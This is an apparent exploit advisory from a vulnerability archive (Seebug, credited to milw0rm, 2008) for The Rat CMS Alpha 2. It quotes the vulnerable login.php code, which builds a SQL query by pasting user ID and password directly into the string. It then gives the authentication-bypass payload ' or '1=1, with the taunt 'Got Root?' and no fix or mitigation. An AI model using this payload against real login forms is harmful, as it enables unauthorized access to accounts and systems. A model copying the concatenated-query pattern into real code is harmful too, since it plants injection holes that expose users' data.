The Rat Cms Alpha 2 (Auth Bypass) SQL Injection Vulnerability

2008-12-15T00:00:00
ID SSV:17636
Type seebug
Reporter Root
Modified 2008-12-15T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ---------------------------------
The Rat Cms Auth By Pass
---------------------------------
Autore: x0r
Email: andry2000@hotmail.it
--------------------------------
Bug In: \login.php

	$sql = "SELECT user_id 
	        FROM tbl_auth_user
			WHERE user_id = '$userId' AND user_password = PASSWORD('$password')";
			
$result = mysql_query($sql) or die('Query failed. ' . mysql_error()); 

Exploit: ' or '1=1

^^ Got Root?

# milw0rm.com [2008-12-15]